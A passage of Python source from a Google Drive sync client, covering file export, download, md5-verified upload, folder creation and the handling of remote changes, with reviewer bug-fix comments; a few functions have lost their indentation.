    a conventional mime type using the mapping in cfg.MEDIA_EXPORT_MATRIX,
    which also supplies the file extension appended to `targetPath`.

    Returns:
        True when the export was written to disk; False when the mime type
        has no export mapping or the API call failed.
    """
    logging.debug("exporting the native google application file %s.", file.name)
    bSuccess = False
    try:
        gServiceFiles = service.files()
        # get type of application
        targetMimeType = None
        if file.properties['mimeType'] in cfg.MEDIA_EXPORT_MATRIX.keys():
            targetMimeType = cfg.MEDIA_EXPORT_MATRIX[file.properties['mimeType']]["targetMimeType"]
            targetExtension = cfg.MEDIA_EXPORT_MATRIX[file.properties['mimeType']]["extension"]
            targetPath = targetPath + targetExtension
        if targetMimeType is None:
            # No export mapping for this mime type.
            return False
        params = { "fileId": file.id,
            "mimeType": targetMimeType
        }
        request = gServiceFiles.export_media(**params)
        fileData = io.BytesIO()
        downloader = MediaIoBaseDownload(fileData, request)
        done = False
        while done is False:
            status, done = downloader.next_chunk()
            print(F'Download {int(status.progress() * 100)}.')
        with open(targetPath, "wb+") as f:
            f.write(fileData.getbuffer())
        # BUG FIX: the original never set bSuccess on the success path, so the
        # function always returned False even after a successful export.
        bSuccess = True
    except HttpError as err:
        logging.error("error exporting google application file. %s", str(err))
        print(err)
        bSuccess = False
    return bSuccess
# return a listing of files in a directory (non-recursive)
def list_files_in_dir(service, folder:gFolder, maxFiles = 1000) -> List[gFile]:
"""List the regular (non-folder) files directly inside `folder`.

Returns up to ~maxFiles gFile objects; the cap is checked once per page,
so the final page may overshoot it. md5 is left unset here (it is filled
in when the file is downloaded). On API error, returns whatever was
collected so far.
"""
logging.debug("listing files in %s directory", folder.name)
files = []
try:
gServiceFiles = service.files()
params = { "q": "mimeType!='application/vnd.google-apps.folder' and '" +
folder.id + "' in parents",
"pageSize": cfg.PAGE_SIZE,
"fields": "nextPageToken," + cfg.FILE_FIELDS
}
request = gServiceFiles.list(**params)
while (request is not None) and len(files) <= maxFiles:
files_page = request.execute()
fs = files_page.get('files', [])
for f in fs:
objFile = gFile(f)
objFile.md5 = None
files.append(objFile)
request = gServiceFiles.list_next(request, files_page)
except HttpError as err:
logging.error("error listing files." + str(err))
print(err)
return files
# download all files in a folder (non-recursive)
def download_files_from_folder(service, folder: gFolder, targetDir: str) -> bool:
    """Download every non-native file directly inside `folder` to `targetDir`.

    Non-recursive. Each download runs on its own thread with its own http2
    transport and database handle, because the Google API client stack is
    not thread safe.

    Returns:
        True when all submitted downloads completed without raising,
        False when an unexpected error aborted the batch.
    """
    logging.debug("starting to download files from %s to %s" % (folder.name, targetDir))
    bResult = False
    try:
        files = list_files_in_dir(service, folder)
        # the google api module isn't thread safe, since it's based on http2 which also isn't thread safe
        # https://googleapis.github.io/google-api-python-client/docs/thread_safety.html
        with concurrent.futures.ThreadPoolExecutor(max_workers=cfg.MAX_THREADS) as executor:
            futures = []
            for f in files:
                # Native Google formats cannot be downloaded here; they need export.
                if not "application/vnd.google-apps" in f.properties['mimeType']:
                    filePath = os.path.join(targetDir, folder.name, f.name)
                    # build a new http2 object to enable thread safety. gets passed to each thread
                    credentials = Credentials.from_authorized_user_file(cfg.TOKEN_CACHE, cfg.TARGET_SCOPES)
                    authorized_http = google_auth_httplib2.AuthorizedHttp(credentials, http=httplib2.Http())
                    service = discovery.build('drive', 'v3', requestBuilder=build_request, http=authorized_http)
                    # build new database object for multi-threading too
                    threadSafeDB = sqlite_store()
                    threadSafeDB.open(cfg.DATABASE_PATH)
                    futures.append(executor.submit(
                        download_file, service, f, filePath, threadSafeDB
                    ))
            for future in concurrent.futures.as_completed(futures):
                result = future.result()
                logging.debug("Download result: %s" % str(result))
        # BUG FIX: the original never set bResult on success, so callers always
        # received False. Report success once every future has completed.
        bResult = True
    except Exception as err:
        logging.error("error downloading directory %s. %s." % (folder.name, str(err)))
        bResult = False
    return bResult
def write_folder_cache(service, localCachePath:str = cfg.FOLDERS_CACHE_PATH):
"""Dump every Drive folder's metadata to the local cache and the database.

Writes one JSON file per folder under cfg.FOLDERS_CACHE_PATH, records each
folder and its parent links in cfg.DATABASE, caches the root folder to
'<cache>_root' and fills cfg.ROOT_FOLDER_ID when it is empty.
NOTE(review): the localCachePath parameter is accepted but the body uses
cfg.FOLDERS_CACHE_PATH directly -- confirm which should win.
"""
logging.debug("writing local folder cache to %s." % str(localCachePath))
try:
# get the root folder
gServiceFiles = service.files()
if not cfg.ROOT_FOLDER_OBJECT:
request = gServiceFiles.get(fileId = 'root')
rootFolder = request.execute()
else:
rootFolder = cfg.ROOT_FOLDER_OBJECT.properties
fRootFolder = open(cfg.FOLDERS_CACHE_PATH + "_root", "w+")
fRootFolder.write(json.dumps(rootFolder, indent = 4))
fRootFolder.close()
#global ROOT_FOLDER_ID
if cfg.ROOT_FOLDER_ID == '':
cfg.ROOT_FOLDER_ID = rootFolder['id']
#print('List files')
# NOTE(review): pageToken is assigned but never used; paging is handled by
# list_next() below.
pageToken = None
params = { "q": "mimeType='application/vnd.google-apps.folder'",
"pageSize": cfg.PAGE_SIZE,
"fields": "nextPageToken," + cfg.FOLDER_FIELDS
}
request = gServiceFiles.list(**params)
while request is not None:
files_page = request.execute()
fs = files_page.get('files', [])
for f in fs:
#print(f)
with open(cfg.FOLDERS_CACHE_PATH + f['id'], 'w+') as folder_data:
folderObj = gFolder(f)
folderObj.localPath = os.path.join(cfg.DRIVE_CACHE_PATH, get_full_folder_path(service, folderObj))
cfg.DATABASE.insert_gObject(folder=folderObj)
if 'parents' in folderObj.properties.keys():
cfg.DATABASE.insert_parents(folderObj.id, folderObj.properties['parents'])
folder_data.write(json.dumps(f, indent=5))
folder_data.close()
request = gServiceFiles.list_next(request, files_page)
except HttpError as err:
logging.error("error writing local folder cache. %s", str(err))
print(err)
# full sync down
def do_full_download(service, folder: gFolder, targetPath:str):
    """Recursively download a Drive folder tree into targetPath.

    Downloads the files directly inside `folder` into targetPath, then recurses
    into each child folder under targetPath/<folder.name>.
    """
    logging.debug("starting full download from google drive to %s" % targetPath)
    try:
        download_files_from_folder(service, folder, targetPath)
        if folder.children is not None:
            for child in folder.children:
                do_full_download(service, child, os.path.join(targetPath, folder.name))
    except Exception as err:
        # BUG FIX: the original logged "error writing local folder cache",
        # a copy/paste from write_folder_cache
        logging.error("error performing full download. %s" % str(err))
        print(str(err))
# retrieve the metadata for Google object (file or folder)
def get_drive_object(service, id:str):
    """Fetch full metadata for a Drive object by id and wrap it.

    Returns a gFolder for folders, a gFile for everything else, or None when
    the object can't be retrieved.
    """
    return_object = None
    try:
        gServiceFiles = service.files()
        params = { "fileId": id,
                   "fields": "*"
        }
        request = gServiceFiles.get(**params)
        obj = request.execute()  # renamed from 'object' to avoid shadowing the builtin
        if obj is not None:
            if obj['mimeType'] == 'application/vnd.google-apps.folder':
                return_object = gFolder(obj)
            else:
                return_object = gFile(obj)
    except Exception as err:
        # HttpError is an Exception subclass and both handlers were identical,
        # so a single handler covers both cases
        logging.error("Unable to fetch metadata from google drive for object id %s. %s" % (id, str(err)))
    return return_object
# create folder in Google Drive
def create_drive_folder(service, folderName:str, localPath:str, parentId:str=None) -> gFolder:
    """Create a folder in Google Drive and record it in the local database.

    Args:
        service: authorized Drive v3 service.
        folderName: name for the new Drive folder.
        localPath: local filesystem path recorded on the returned gFolder.
        parentId: Drive id of the parent folder; defaults to the drive root.

    Returns:
        The new gFolder, or None on error.
    """
    folder = None
    try:
        if parentId is None or parentId == "":
            parentId = cfg.ROOT_FOLDER_ID
        # BUG FIX: the Drive v3 API expects 'parents' to be a list of folder
        # ids; the original passed the bare string
        file_metadata = {
            'name': folderName,
            'mimeType': 'application/vnd.google-apps.folder',
            'parents': parentId if isinstance(parentId, list) else [parentId]
        }
        logging.info("creating folder %s in Google Drive" % folderName)
        f = service.files().create(body=file_metadata, fields='*').execute()
        folder = gFolder(f)
        folder.localPath = localPath
        cfg.DATABASE.insert_gObject(folder=folder)
    except HttpError as err:
        logging.error("error creating Google Drive folder. %s" % str(err))
    except Exception as err:
        logging.error("error creating Google Drive folder. %s" % str(err))
    return folder
# create the entire folder tree, if any part doesn't exist
def create_drive_folder_tree(service, folderPath:str) -> gFolder:
    """Ensure every segment of folderPath exists in Google Drive.

    Walks the path segment by segment under cfg.ROOT_FOLDER_OBJECT, creating
    any Drive folder not already known to the database, and returns the
    deepest folder (or None on error).
    """
    parentFolder = None
    try:
        # BUG FIX: the original compared two config values
        # (cfg.DRIVE_CACHE_PATH vs cfg.ROOT_FOLDER_OBJECT.localPath) instead of
        # validating the argument, and raised a plain string -- which is a
        # TypeError in Python 3 -- followed by an unreachable 'return'.
        if cfg.DRIVE_CACHE_PATH not in folderPath:
            raise ValueError("folder path isn't the defined drive cache path.")
        # strip the local cache prefix, leaving the drive-relative path
        folderPath = folderPath.replace(cfg.ROOT_FOLDER_OBJECT.localPath + "/", "")
        folders = folderPath.split(os.sep)
        parent = cfg.ROOT_FOLDER_OBJECT
        currentFolder = cfg.ROOT_FOLDER_OBJECT.localPath
        for folder in folders:
            currentFolder = os.path.join(currentFolder, folder)
            c, dbFolders = cfg.DATABASE.fetch_gObjectSet(searchField="local_path", \
                                                         searchCriteria=currentFolder)
            if len(dbFolders) == 0:
                # unknown locally -> create it in Drive (also records it in the db)
                parent = create_drive_folder(service, folder, currentFolder, parent.id)
            else:
                parent = dbFolders[0]
        parentFolder = parent
    except HttpError as err:
        logging.error("error creating Google Drive folder tree. %s" % str(err))
    except Exception as err:
        logging.error("error creating Google Drive folder tree. %s" % str(err))
    return parentFolder
def upload_drive_file(service, filePath:str, parentId:str = None)-> gFile:
    """Upload a local file to Google Drive, verifying the md5 checksum.

    Retries up to cfg.UPLOAD_RETRIES_MAX times: after each upload the remote
    md5Checksum is compared with the local hash; on mismatch the remote copy
    is deleted and the upload is retried.

    Args:
        service: authorized Drive v3 service.
        filePath: path of the local file to upload.
        parentId: Drive id of the destination folder (root when None/empty).

    Returns:
        The verified gFile on success, otherwise None / the deleted remote copy.
    """
    file = None
    try:
        # invariants hoisted out of the retry loop
        fileSize = os.path.getsize(filePath)
        fileHash = mods.hash_file(filePath)
        for attempt in range(1, cfg.UPLOAD_RETRIES_MAX + 1):
            # if file is under 5 mb perform a simple upload
            if fileSize <= (5 * 1024 * 1024):
                f = upload_drive_file_simple(service, filePath, parentId)
            else:
                # we need to figure out how to do resumable uploads at some point later
                f = upload_drive_file_simple(service, filePath, parentId)
            if f is None:
                # BUG FIX: the original passed None straight to gFile() when the
                # upload failed; treat it as a spent attempt instead
                continue
            file = gFile(f)
            if fileHash != file.properties['md5Checksum']:
                logging.warning("File upload resulted in a hash mismatch.")
                # remove the corrupt remote copy and try again
                file = delete_drive_file(service, file)
            else:
                file.localPath = filePath
                file.md5 = fileHash
                cfg.DATABASE.insert_gObject(file=file)
                break
        else:
            # BUG FIX: the original tested 'attempt == UPLOAD_RETRIES_MAX'
            # inside the loop, logging "exceeded" before the final attempt ran;
            # for/else fires only after every attempt has failed
            logging.error("Exceeded max retries to upload file '%s'" % filePath)
    except HttpError as err:
        logging.error("error uploading file to Google Drive. %s" % str(err))
    except Exception as err:
        logging.error("error uploading file to Google Drive. %s" % str(err))
    return file
def upload_drive_file_simple(service, filePath:str, parentId:str=None)->gFile:
    """Upload filePath to Google Drive in a single (media) upload.

    Returns the raw file-metadata dict from the API ('fields=*'), or None
    on error.
    """
    file = None
    try:
        if parentId is None or parentId == "":
            parentId = cfg.ROOT_FOLDER_ID
        fileName = os.path.basename(filePath)
        logging.info("performing simple upload of file '%s'" % filePath)
        # BUG FIX: the Drive v3 API expects 'parents' to be a list of folder
        # ids; the original passed the bare string
        parents = parentId if isinstance(parentId, list) else [parentId]
        file_metadata = {'name': fileName, 'parents': parents}
        media = MediaFileUpload(filePath, resumable=True)
        file = service.files().create(body=file_metadata, media_body=media,
                                      fields='*').execute()
    except HttpError as err:
        # typo fix: "downing" -> "doing"
        logging.error("error doing a simple file upload to Google Drive. %s" % str(err))
    except Exception as err:
        logging.error("error doing a simple file upload to Google Drive. %s" % str(err))
    return file
# uploads new files that have been identified as missing from the cloud post reconciliation
def upload_new_local_files(service):
    """Queue 'created' change events for local files missing from the cloud.

    Pages through cfg.DATABASE.fetch_newLocalFiles(); for every regular file
    under the local cache root it resolves (or creates) the Drive parent
    folder, then puts a 'created' filewatcher.Change on cfg.LOCAL_QUEUE so the
    normal change pipeline performs the actual upload.
    """
    logging.debug("starting to upload new local files to the cloud.")
    try:
        records, new_local_files = cfg.DATABASE.fetch_newLocalFiles()
        recordsParsed = 0
        while records > 0:
            for f in new_local_files:
                if cfg.ROOT_FOLDER_OBJECT.localPath in f.localPath:
                    # BUG FIX: the original did 'return' on the first folder it
                    # met, silently aborting the whole upload pass; folders are
                    # simply skipped (but still counted for pagination).
                    if f.mimeType != cfg.TYPE_GOOGLE_FOLDER:
                        parentFolder = os.path.dirname(f.localPath)
                        c, db_parentFolders = cfg.DATABASE.fetch_gObjectSet(searchField = "local_path", \
                                                                            searchCriteria=parentFolder)
                        # BUG FIX: the original indexed db_parentFolders[0]
                        # unconditionally (IndexError on an empty result) and
                        # assigned a bare string to 'parents' in the else branch
                        if len(db_parentFolders) > 0 and db_parentFolders[0] is not None:
                            f.properties['parents'] = [db_parentFolders[0].id]
                        else:
                            parent = create_drive_folder_tree(service, parentFolder)
                            f.properties['parents'] = [parent.id]
                        change = filewatcher.Change('created', f.localPath, None, 'file')
                        cfg.LOCAL_QUEUE.put(change)
                else:
                    logging.warning("skipping file '%s'. path not in local cache directory." % f.localPath)
                recordsParsed += 1
            records, new_local_files = cfg.DATABASE.fetch_newLocalFiles(offset=recordsParsed)
    except Exception as err:
        logging.error("error uploading new files to the cloud. %s" % str(err))
def update_drive_file(service, file:gFile, localPath:str):
    """Push the content at localPath to an existing Drive file.

    Uploads the local content, re-fetches the enriched metadata, carries over
    the local path / md5 from the given gFile, and refreshes the database row.
    Returns the refreshed gFile, or None on error.
    """
    logging.info("updating Google drive file %s." % file.name)
    updated_file = None
    try:
        upload_media = MediaFileUpload(localPath, resumable=True)
        # push the new content to the existing Drive file
        response = service.files().update(
            fileId=file.id,
            media_body=upload_media).execute()
        # re-fetch to get the enriched full metadata, then carry over local state
        updated_file = get_drive_object(service, response['id'])
        updated_file.localPath = file.localPath
        updated_file.md5 = file.md5
        cfg.DATABASE.update_gObject(file=updated_file)
    except HttpError as err:
        logging.error("error updating Google drive file '%s'. %s" % (file.name, str(err)))
    except Exception as err:
        logging.error("error updating Google drive file '%s'. %s" % (file.name, str(err)))
    return updated_file
def update_drive_files(service):
    """Queue 'modified' change events for local files that changed on disk.

    Pages through cfg.DATABASE.fetch_changedLocalFiles() and, for every regular
    file under the local cache root, puts a 'modified' filewatcher.Change on
    cfg.LOCAL_QUEUE so the normal change pipeline performs the upload.
    """
    logging.debug("starting to update changed local files to the cloud.")
    try:
        c, changed_local_files = cfg.DATABASE.fetch_changedLocalFiles()
        recordsParsed = 0
        while c > 0:
            for f in changed_local_files:
                if cfg.ROOT_FOLDER_OBJECT.localPath in f.localPath:
                    # BUG FIX: the original did 'return' on the first folder it
                    # met, aborting the whole scan; folders are simply skipped
                    # (but still counted for pagination).
                    if f.mimeType != cfg.TYPE_GOOGLE_FOLDER:
                        change = filewatcher.Change('modified', f.localPath, None, 'file')
                        cfg.LOCAL_QUEUE.put(change)
                else:
                    logging.warning("skipping file '%s'. path not in local cache directory." % f.localPath)
                recordsParsed += 1
            # BUG FIX: the original paginated with fetch_newLocalFiles, mixing
            # brand-new files into the changed-files pass
            c, changed_local_files = cfg.DATABASE.fetch_changedLocalFiles(offset=recordsParsed)
    except Exception as err:
        # BUG FIX: the original referenced f.name here, which raises NameError
        # if the initial fetch failed before the loop ran
        logging.error("error updating changed local files. %s" % str(err))
def move_drive_file(service, file:gFile, newParent_id: str=None, newName:str = None) -> gFile:
    """Move and/or rename a file in Google Drive.

    If newParent_id differs from the file's current first parent, the file is
    re-parented; otherwise, if newName is given and differs from the current
    name, the file is renamed.  Returns the refreshed gFile (or the original
    object on a no-op / error).
    """
    try:
        # check newParent_id for None first so a file with no 'parents' entry
        # doesn't raise before the guard
        if newParent_id is not None and file.properties['parents'][0] != newParent_id:
            prev_parents = ','.join(file.properties['parents'])
            file = service.files().update(fileId=file.id, addParents=newParent_id,
                                          removeParents=prev_parents,
                                          fields='id, parents').execute()
            file = get_drive_object(service, file['id'])
            logging.info("moved file ID '%s' to new parent ID '%s'" % (file.id, newParent_id))
        # BUG FIX: the original only checked file.name != newName, so a call
        # with newName=None renamed the file to None
        elif newName is not None and file.name != newName:
            file = service.files().update(fileId=file.id, body={'name': newName}).execute()
            file = get_drive_object(service, file['id'])
        else:
            logging.warning("Unable to process file '%s' move. Can't parse the change." % file.id)
    except HttpError as err:
        logging.error("error moving file '%s' in Google Drive. %s" % (file.name, str(err)))
    except Exception as err:
        logging.error("error moving file '%s' in Google Drive. %s" % (file.name, str(err)))
    return file
def delete_drive_file(service, file:gFile):
    """Delete a file from Google Drive and drop it from the local database.

    Note: despite marking the in-memory object as trashed, this performs a
    hard API delete (files.delete), not a move to trash.  A 404 from the API
    means the file is already gone from Drive, so only the db row is removed.
    Returns the (trashed-marked) gFile.
    """
    try:
        file.properties['trashed'] = True
        gServiceFiles = service.files()  # renamed: was misspelled 'gSerivceFiles'
        gServiceFiles.delete(fileId = file.id).execute()
        logging.info("deleted Google Drive file with id %s" % file.id)
        cfg.DATABASE.delete_gObject(id=file.id) # do we want to delete the file? or just mark it as trashed?
    except HttpError as err:
        # 404, delete from db since it's gone from Drive
        if err.resp.status == 404:
            logging.info("File not found in Drive, removing from db.")
            cfg.DATABASE.delete_gObject(id=file.id) # do we want to delete the file? or just mark it as trashed?
        else:
            # typo fix: "deleteing" -> "deleting"
            logging.error("error deleting file '%s' from Google Drive. %s" % (file.name, str(err)))
    except Exception as err:
        logging.error("error deleting file '%s' from Google Drive. %s" % (file.name, str(err)))
    return file
# region : Change tracking in Google drive
# gets the change token for changes in the drive since last sync
# https://developers.google.com/drive/api/guides/manage-changes
def get_drive_changes_token(service):
    """Return Drive's current start-page token for change polling.

    See https://developers.google.com/drive/api/guides/manage-changes.
    Returns None when the token could not be fetched.
    """
    logging.info("fetching the start changes token from Google Drive.")
    pageToken = None
    try:
        result = service.changes().getStartPageToken().execute()
        pageToken = result.get("startPageToken")
    except HttpError as err:
        logging.error("error getting changes start token. %s", str(err))
        print(err)
    except Exception as err:
        logging.error("error getting changes start token. %s", str(err))
        print(str(err))
    return pageToken
# get changes since the last change token fetch
# https://developers.google.com/drive/api/guides/manage-changes
def get_drive_changes(service, changeToken):
    """Collect every Drive change recorded since changeToken.

    Pages through the changes feed; when the final page is reached, the
    'newStartPageToken' it carries is saved into cfg.CHANGES_TOKEN for the
    next polling interval.  Returns the accumulated list of change records.
    """
    changes = []
    try:
        pageToken = changeToken
        while pageToken is not None:
            response = service.changes().list(pageToken=pageToken,
                                              spaces='drive').execute()
            changes.extend(response.get('changes'))
            if 'newStartPageToken' in response:
                # last page: remember where the next polling cycle should start
                cfg.CHANGES_TOKEN = response.get('newStartPageToken')
            pageToken = response.get('nextPageToken')
    except HttpError as err:
        logging.error("error getting changes from Drive. %s", str(err))
        print(err)
    except Exception as err:
        logging.error("error getting changes from Drive. %s", str(err))
        print(str(err))
    return changes
# handles any sort of change in a file in google drive (create, update, delete)
def handle_changed_file(service, file:gFile = None):
    """Apply a Google-Drive-side file change (create / update / trash) locally.

    The file is looked up in the database by id:
      * not in db         -> new cloud file: record it and download a copy
                             under each of its parent folders.
      * in db, cloud newer-> on checksum change, re-download; on rename, move
                             the local copy; the db row is updated either way.
      * trashed in cloud  -> update the db and remove the local copy/copies.

    Every local path touched is appended to cfg.LQUEUE_IGNORE so the local
    filewatcher does not echo the change back up to the cloud.
    """
    try:
        if file is not None:
            # ******************************************
            # create or update an existing file
            # ******************************************
            dbFiles = cfg.DATABASE.fetch_gObject(file.id)
            if len(dbFiles) > 1:
                # fix: logging.warn is a deprecated alias of logging.warning
                logging.warning("file id %s has multiple entries in the database. skipping." % file.id)
            elif len(dbFiles) == 0:
                # **** handle new files from Google Drive ****
                logging.debug("file id %s isn't in the database, assuming a new object." % file.id)
                if 'parents' in file.properties.keys():
                    for parent_id in file.properties['parents']:
                        parent_folder = get_drive_object(service, parent_id)
                        full_path = os.path.join(cfg.DRIVE_CACHE_PATH, \
                                                 get_full_folder_path(service, parent_folder), \
                                                 file.name)
                        full_path = os.path.expanduser(full_path)
                        file.localPath = full_path
                        cfg.DATABASE.insert_gObject(file=file)
                        if file.properties['trashed'] == False:
                            cfg.LQUEUE_IGNORE.append(full_path)
                            download_file(service, file, full_path)
            else:
                # **** handle file updates ****
                dbFile = dbFiles[0]
                if file.properties != dbFile.properties and int(file.properties['version']) > int(dbFile.properties['version']):
                    logging.info("file id %s is newer in the cloud and has changes, processing." % file.id)
                    if (file.properties['trashed'] == False):
                        file.localPath = dbFile.localPath
                        if (file.properties['md5Checksum'] != dbFile.md5 or file.name != dbFile.name):
                            file.md5 = dbFile.md5 # we'll download it later if we need to
                            try:
                                # delete the existing files and redownload for each instance of the file
                                if 'parents' in file.properties.keys():
                                    for parent_id in file.properties['parents']:
                                        for db_parent_id in dbFile.properties['parents']:
                                            # resolve the new and old local locations
                                            parent_folder = get_drive_object(service, parent_id)
                                            root_path = os.path.join(cfg.DRIVE_CACHE_PATH, \
                                                                     get_full_folder_path(service, parent_folder))
                                            full_path = os.path.join(root_path, file.name)
                                            full_path = os.path.expanduser(full_path)
                                            parent_folder = get_drive_object(service, db_parent_id)
                                            root_path_old = os.path.join(cfg.DRIVE_CACHE_PATH, \
                                                                         get_full_folder_path(service, parent_folder))
                                            full_path_old = os.path.join(root_path_old, dbFile.name)
                                            full_path_old = os.path.expanduser(full_path_old)
                                            # do the redownload if the md5 doesn't match
                                            if file.properties['md5Checksum'] != dbFile.md5:
                                                logging.info("file id %s checksum is different and cloud version is newer, redownloading." % file.id)
                                                if file.properties['trashed'] == False:
                                                    cfg.LQUEUE_IGNORE.append(full_path)
                                                    if os.path.exists(full_path):
                                                        logging.info("removing outdated file '%s'." % full_path)
                                                        os.remove(full_path)
                                                    download_file(service, file, full_path)
                                            # do the rename
                                            if file.name != dbFile.name:
                                                if root_path_old == root_path:
                                                    if file.properties['trashed'] == False:
                                                        cfg.LQUEUE_IGNORE.append(full_path_old)
                                                        cfg.LQUEUE_IGNORE.append(full_path)
                                                        os.rename(full_path_old, full_path)
                                cfg.DATABASE.update_gObject(file=file)
                            except Exception as err:
                                logging.error("unable to update file id %s. %s" % (file.id, str(err)))
                        else:
                            # properties changed but content/name did not: just refresh the db
                            file.md5 = dbFile.md5
                            cfg.DATABASE.update_gObject(file=file)
                    # ***** delete a local file ******
                    elif file.properties['trashed'] == True:
                        file.md5 = dbFile.md5
                        file.localPath = dbFile.localPath
                        cfg.DATABASE.update_gObject(file=file)
                        if 'parents' in file.properties.keys():
                            for parent_id in file.properties['parents']:
                                try:
                                    parent_folder = get_drive_object(service, parent_id)
                                    full_path = os.path.join(cfg.DRIVE_CACHE_PATH, \
                                                             get_full_folder_path(service, parent_folder), \
                                                             file.name)
                                    full_path = os.path.expanduser(full_path)
                                    if os.path.exists(full_path):
                                        logging.info("removing trashed file '%s'" % full_path)
                                        cfg.LQUEUE_IGNORE.append(full_path)
                                        os.remove(full_path)
                                except Exception as err:
                                    logging.error("unable to remove local file %s. %s" % (full_path, str(err)))
    # fix: HttpError must precede Exception -- in the original order the
    # HttpError handler was unreachable (HttpError is an Exception subclass)
    except HttpError as err:
        logging.error("error processing Google object change. %s" % str(err))
    except Exception as err:
        logging.error("error processing Google object change. %s" % str(err))
    return
# handles any sort of folder change in google drive (create, update, delete)
def handle_changed_folder(service, folder: gFolder = None):
    """Apply a Google-Drive-side folder change (create / rename / trash) locally.

    The folder is looked up in the database by id:
      * not in db          -> new cloud folder: record it and create the local
                              directory under each parent.
      * in db, cloud newer -> update the db row; rename the local directory if
                              the cloud name changed; remove the local tree if
                              the folder was trashed.

    Paths touched locally are pushed onto cfg.LQUEUE_IGNORE so the local
    filewatcher doesn't echo the change back to the cloud.
    """
    try:
        if folder is not None:
            # *************************************************************************
            # create or update an existing folder
            # *************************************************************************
            dbFolders = cfg.DATABASE.fetch_gObject(folder.id)
            if len(dbFolders) > 1:
                # fix: logging.warn is a deprecated alias of logging.warning
                logging.warning("folder id %s has multiple entries in the database. skipping." % folder.id)
            elif len(dbFolders) == 0:
                # **** new folder from Google Drive ****
                logging.debug("folder %s isn't in the database, assuming a new object." % folder.id)
                folder.localPath = os.path.join(cfg.DRIVE_CACHE_PATH, get_full_folder_path(service, folder))
                cfg.DATABASE.insert_gObject(folder=folder)
                if 'parents' in folder.properties.keys():
                    for parent_id in folder.properties['parents']:
                        parent_folder = get_drive_object(service, parent_id)
                        full_path = os.path.join(cfg.DRIVE_CACHE_PATH, \
                                                 get_full_folder_path(service, parent_folder), \
                                                 folder.name)
                        full_path = os.path.expanduser(full_path)
                        if not os.path.exists(full_path):
                            cfg.LQUEUE_IGNORE.append(full_path)
                            logging.info("creating new local folder '%s'" % full_path)
                            os.mkdir(os.path.expanduser(full_path))
            else:
                # if folder name is different, rename it. if it's trashed, remove it. only changes possible for folders
                dbFolder = dbFolders[0]
                if folder.properties != dbFolder.properties and int(folder.properties['version']) > int(dbFolder.properties['version']):
                    logging.info("folder id %s has a later version and different properties in Google Drive, applying changes" % folder.id)
                    # update the folder properties in the db
                    folder.localPath = os.path.join(cfg.DRIVE_CACHE_PATH, get_full_folder_path(service, folder))
                    cfg.DATABASE.update_gObject(folder=folder)
                    # **** rename the local folder(s) ****
                    if folder.name != dbFolder.name and folder.properties['trashed'] == False:
                        for parent_id in folder.properties['parents']:
                            for db_parent_id in dbFolder.properties['parents']:
                                parent_folder = get_drive_object(service, parent_id)
                                root_path_new = os.path.join(cfg.DRIVE_CACHE_PATH, \
                                                             get_full_folder_path(service, parent_folder))
                                full_path_new = os.path.join(root_path_new, folder.name)
                                full_path_new = os.path.expanduser(full_path_new)
                                parent_folder = get_drive_object(service, db_parent_id)
                                root_path_old = os.path.join(cfg.DRIVE_CACHE_PATH, \
                                                             get_full_folder_path(service, parent_folder))
                                full_path_old = os.path.join(root_path_old, dbFolder.name)
                                full_path_old = os.path.expanduser(full_path_old)
                                if root_path_old == root_path_new:
                                    cfg.LQUEUE_IGNORE.append(full_path_new)
                                    cfg.LQUEUE_IGNORE.append(full_path_old)
                                    os.rename(full_path_old, full_path_new)
                    # ***** delete a local folder ******
                    if folder.properties['trashed'] == True:
                        if 'parents' in folder.properties.keys():
                            for parent_id in folder.properties['parents']:
                                parent_folder = get_drive_object(service, parent_id)
                                full_path = os.path.join(cfg.DRIVE_CACHE_PATH, \
                                                         get_full_folder_path(service, parent_folder), \
                                                         folder.name)
                                full_path = os.path.expanduser(full_path)
                                if os.path.exists(full_path):
                                    cfg.LQUEUE_IGNORE.append(full_path)
                                    logging.info("removing trashed directory '%s'" % full_path)
                                    shutil.rmtree(full_path)
    # fix: HttpError must precede Exception -- in the original order the
    # HttpError handler was unreachable (HttpError is an Exception subclass)
    except HttpError as err:
        logging.error("error processing Google object change. %s" % str(err))
    except Exception as err:
        logging.error("error processing Google object change. %s" % str(err))
    return
# scans all files in Google drive that aren't in the db. that's our change set.
# this only needs to happen during startup. otherwise, change notifications will do the job
def get_gdrive_changes(service) -> List:
    """Scan every file owned by the user in Google Drive and queue changed items.

    For each file/folder whose Drive 'version' is newer than the database copy
    (or which is missing from the database entirely), the full metadata is
    fetched and the wrapped gFile/gFolder is pushed onto cfg.REMOTE_QUEUE for
    the change pipeline to process.

    Note: results go to cfg.REMOTE_QUEUE; the 'differences' list is never
    appended to, so this function always returns an empty list.

    This only needs to run during startup -- afterwards, change notifications
    take over.
    """
    logging.info("scanning google drive files, looking for files and folders that have changed.")
    differences = []
    try:
        gServiceFiles = service.files()
        # only files owned by this user; request just the fields needed to
        # decide whether anything changed
        params = { "q": "'me' in owners",
                   "pageSize": cfg.PAGE_SIZE,
                   "fields": "nextPageToken," + "files(id, name, mimeType, version, md5Checksum, parents, ownedByMe)"
        }
        request = gServiceFiles.list(**params)
        while (request is not None):
            files_page = request.execute()
            fs = files_page.get('files', [])
            for f in fs:
                # look up the db copy (if any) to compare versions against
                dbFile = None
                rows = cfg.DATABASE.fetch_gObject(f['id'])
                if len(rows) > 0:
                    dbFile = rows[0]
                if f['mimeType'] == cfg.TYPE_GOOGLE_FOLDER:
                    googleFolder = gFolder(f)
                    if dbFile is not None and 'version' in dbFile.properties.keys():
                        if (int(dbFile.properties['version']) < int(googleFolder.properties['version'])):
                            # cloud folder is newer: fetch full metadata and queue it
                            get_params = {"fileId": googleFolder.id, "fields": "*"}
                            get_req = gServiceFiles.get(**get_params)
                            full_folder = gFolder(get_req.execute())
                            full_folder.localPath = get_full_folder_path(service, full_folder)
                            cfg.REMOTE_QUEUE.put(full_folder)
                    else:
                        # folder unknown locally (or missing version info): queue it as new
                        get_params = {"fileId": googleFolder.id, "fields": "*"}
                        get_req = gServiceFiles.get(**get_params)
                        full_folder = gFolder(get_req.execute())
                        cfg.REMOTE_QUEUE.put(full_folder)
                else:
                    googleFile = gFile(f)
                    if dbFile is not None and 'version' in dbFile.properties.keys():
                        if (int(dbFile.properties['version']) < int(googleFile.properties['version'])):
                            # cloud file is newer: fetch full metadata and queue it
                            get_params = {"fileId": googleFile.id, "fields": "*"}
                            get_req = gServiceFiles.get(**get_params)
                            full_file = gFile(get_req.execute())
                            cfg.REMOTE_QUEUE.put(full_file)
                    else:
                        # file unknown locally: queue it as new, but skip native
                        # Google Apps documents
                        if cfg.TYPE_GOOGLE_APPS not in googleFile.mimeType:
